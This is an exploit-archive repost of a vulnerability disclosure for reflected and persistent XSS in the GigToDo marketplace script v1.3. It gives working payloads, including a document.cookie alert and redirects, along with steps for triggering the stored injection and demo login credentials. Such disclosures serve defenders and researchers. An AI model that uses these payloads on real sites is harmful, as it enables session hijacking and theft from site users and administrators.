Advertisement






GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections

CVE Category Price Severity
CWE-79 Not specified High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2019-07-29
CVSS EPSS EPSSP
Not provided 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070144

Below is a copy:

GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections
/*!
* # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections
* # Google Dork: -
* # Date: 2019/07/28
* # Author: m0ze
* # Vendor Homepage: https://www.gigtodoscript.com
* # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
* # Version: <= 1.3
* # Tested on: NginX/1.15.10
* # CVE: -
* # CWE: CWE-79
*/

::- Details & Description -::
~ The GigToDo - Freelance Marketplace Script web-application is vulnerable to reflected and persistent XSS injections that allows an attacker to inject JavaScript/HTML code into the front-end, redirect visitor to another website or steal admin cookies.

::- Demo Website -::
~ Frontend: https://www.gigtodo.com
~ Frontend (auth): https://www.gigtodo.com/login.php
~ Login / Password (buyer/seller) #1: pat / Pat
~ Login / Password (buyer/seller) #2: patricia / Pat
~ Login / Password (buyer/seller) #3: tyrone / Pat
~ Login / Password (buyer/seller) #4: jess / Pat

::- Special Note -::
~ Web-application price is $175, 14 Sales.
~ Script is fully protected from SQL Injection and XSS.  Pixinal_Studio (web-app author)
~ When you purchase the script, as long as you do not share your admin credentials, you are completely protected. Hope this makes sense?  Pixinal_Studio (web-app author)
~ On the demo website you'll face the Mod_Security WAF which is possible to bypass. There is no guarantee that customers will use some kind of WAF, so entire exploiting process may be much easier. Plus, most of the time users really don't care about security stuff, so passwords for admin area can be brute-forced or admin session can be hijacked by XSS attack vector. At this point, possibility to create an executable .PHP file with users content inside is a huge security breach and time bomb in the design of any web-app.
~ Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients. The same if you do not recognize the fact of breaches in the web-app design, putting your ego above the safety of your customers.

::- PoC Links -::
~ https://www.gigtodo.com/proposals/demouser/lth1gtdemolth1gt
~ https://www.gigtodo.com/proposals/tyrone/i-will-create-beats-for-you

::- PoC [Reflected XSS Injection] -::
~ For reflected XSS injection use the search bar or go to the https://www.gigtodo.com/search page and use payload like one of the listed below.
~ Example #1: <img src='x'+/onerror=(alert)('m0ze')>
~ Example #2: <body +/onload=(alert)('m0ze')>m0ze</body>
~ Example #3: <body +/onload=(alert)(document.cookie)>m0ze</body>
~ Example #4: <svg/onload='window.open(`https://twitter.com/m0ze_ru`);'>

::- PoC [Persistent XSS Injection] -::
~ Register a new account or use one of the provided for the demo website: pat / Pat || patricia / Pat || tyrone / Pat || jess / Pat, log in and go to the https://www.gigtodo.com/proposals/create_proposal page. Vulnerable text area is Proposal's Description, so paste ur payload inside, fill in other fields and save the data TWICE (if u don't understand it read the Important Stuff below).
~ Example #1: <h1 onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is fully protected from SQL Injection and XSS `);'><img src='x' onerror=';alert(`For sure lol`);'>
~ Example #2: <h1 onmouseover=';alert(`Greetz from m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`https://twitter.com/m0ze_ru`);'>

::- PoC [Important Stuff] -::
~ Keep in mind that u need to save ur payload inside the Proposal's Description text area TWICE or ur payload WILL NOT WORK. So literally paste ur payload inside the Proposal's Description text area and scroll down to Update Proposal button, press it and ur data will be saved. After that u'll be redirected to https://www.gigtodo.com/proposals/view_proposals.php page. Select ur created proposal and press green square dropdown menu on the right (Actions column) and click on Edit link. After that just don't change anything, scroll down to Update Proposal button, press it and ur data will be saved ONE MORE TIME. That's it, now ur payload will work.
~ If u are using any redirects inside payload, then DISABLE JS WHILE U EDIT UR PROPOSAL or u just don't be able to re-save the data. And don't forget that u can use links with ur proposal ID to edit it ( https://www.gigtodo.com/proposals/edit_proposal?proposal_id=XX ).

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum